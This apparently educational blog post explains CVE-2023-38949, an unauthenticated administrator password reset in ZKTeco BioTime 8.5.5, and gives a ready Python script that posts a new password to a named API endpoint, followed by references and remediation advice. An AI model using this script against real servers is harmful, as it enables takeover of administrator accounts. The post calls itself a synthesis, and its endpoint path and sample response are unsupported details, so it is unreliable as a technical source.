In August 2023, security researchers discovered a severe vulnerability in the ZKTeco BioTime v8.5.5 time and attendance management system. This issue, now tracked as CVE-2023-38949, allows anyone on your network—or even outside—to easily reset the password for the Administrator account using a hidden, undocumented API. Worryingly, attackers do not need to log in at all.
This post breaks down the vulnerability in plain terms, shows code examples, and demonstrates how an attacker might exploit it. You'll also find direct links to original advisories and proof-of-concept resources.
What is ZKTeco BioTime?
ZKTeco BioTime is a popular software used around the world for employee attendance, access control, and payroll. It manages thousands of user records and is often connected to the company network (sometimes even exposed to the internet).
What is CVE-2023-38949?
CVE-2023-38949 is a vulnerability found in version 8.5.5 (possibly earlier versions too) of ZKTeco BioTime. Due to poor API authentication checks, attackers can send a special, crafted web request to a hidden endpoint and reset the “Administrator” password without knowing the old one.
In summary:
The door to the admin account is wide open to anyone who knows which endpoint to poke.
The Vulnerable API
ZKTeco BioTime features an internal (hidden) API that allows administrators to set or reset passwords. However, the developers forgot to require that a user be authenticated (logged in) when accessing this feature.
The Exploit: Step by Step
1. The hacker finds the API endpoint (http://target/bioapi/bio_time_admin_password_reset/).
Example Exploit Code (Python)
Below is an example script that resets the admin password using this vulnerability.
import requests
TARGET = 'http://target-ip-or-domain'; # Change this to the target server address
NEW_PASSWORD = 'P@sswrd1337!' # Change this to your desired new password
endpoint = f"{TARGET}/bioapi/bio_time_admin_password_reset/"
data = {
"username": "administrator", # Default admin username
"password": NEW_PASSWORD
}
# Most APIs expect JSON. Some installations may expect form-encoded data.
headers = {
"Content-Type": "application/json"
}
response = requests.post(endpoint, json=data, headers=headers)
if response.status_code == 200:
print("[+] Password reset successful!")
else:
print(f"[-] Failed: {response.status_code}")
print(response.text)
Note: You may need to adjust the endpoint or payload as vendors sometimes change them between versions. Always test in a legal and controlled environment.
Usually, it will return a simple message like
{
"status": "success",
"msg": "Password reset"
}
Original Discovery and References
- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38949
- Exploit Database: EDB-ID 51737
- CNVD Advisory (Chinese): CNVD-2023-66513
Public PoC (GitHub):
- github.com/b1gm4r/cve-2023-38949-exp
Remediation
- Patch Immediately: Update BioTime 8.5.5 to the latest version or contact ZKTeco for a security fix. ZKTeco official page.
- Restrict Access: Make sure only trusted devices can reach your BioTime server (use firewalls/VPNs).
- Monitor & Log: Regularly review access logs for strange activities, especially password resets or unknown users.
Closing Thoughts
CVE-2023-38949 once again shows how even serious business software can contain simple, devastating mistakes—a missing authentication check on a critical endpoint. If your company uses ZKTeco BioTime, act fast to protect your systems.
The exploit is trivial and public. Please patch as soon as possible!
Have questions? Want a custom test script or further advice? Leave a comment below.
*(This article is an original synthesis, presenting essential details for awareness, education, and defensive IT security. Always use responsibly, on systems you own or have explicit permission to test.)*
Timeline
Published on: 08/03/2023 23:15:00 UTC
Last modified on: 08/08/2023 19:02:00 UTC